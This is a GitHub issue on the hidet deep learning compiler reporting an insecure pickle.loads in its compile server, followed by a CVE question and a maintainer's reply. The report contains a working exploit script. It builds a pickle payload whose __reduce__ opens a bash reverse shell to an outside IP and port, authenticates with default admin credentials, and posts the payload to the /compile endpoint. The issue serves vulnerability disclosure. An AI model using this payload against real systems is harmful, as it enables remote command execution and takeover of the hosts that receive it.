hidet-org / hidet

An open-source efficient deep learning framework/compiler, written in python.
https://hidet.org
Apache License 2.0
656 stars 53 forks source link

[Bug] Pickle.loads have python deserialization attacks #441

Open fe1w0 opened 8 months ago

fe1w0 commented 8 months ago

Describe the bug In apps/compile server/resources/compilation. Py 126 lines, after get complie server validation, the risk of python deserialization attack can achieve command execution, etc.

Additional context


import pickle
import base64
import requests
import json

class System(object):
    """Create os.system command"""
    def __reduce__(self):
        import os
        return (os.system,('bash -c "bash -i >& /dev/tcp/100.92.79.102/8899 0>&1"',))

code = System()

data1  =  pickle.dumps(code)

print(base64.b64encode(data1))

# default username and password
auth_data = """{
  "username": "admin",
  "password": "admin_password"
}"""

auth_header = {
    "content-type": "application/json"
}

auth_url = "http://100.92.79.102:3281/auth"

auth_res = requests.post(auth_url, data=auth_data, headers=auth_header)

print(auth_res.text)

token = json.loads(auth_res.text)

headers = {
    "authorization":"Bearer " + token["access_token"]
}

res = requests.post('http://100.92.79.102:3281/compile',headers=headers, data=data1)
print(res.text)

20240327_110919

fe1w0 commented 5 months ago

Hello, developers, should I apply for CVE for this security issue

wangshangsam commented 2 months ago

Hi @fe1w0 , thanks a lot for reporting this issue.

The compilation server is meant to be used as a developer productivity tool for oneself; it's not meant to be deployed as a service endpoints for others to use (at least not as of our foreseeable roadmap).

With that being said, if you would like to contribute a PR that replaces the usage of pickle with something more secure, we'd love to welcome your contribution.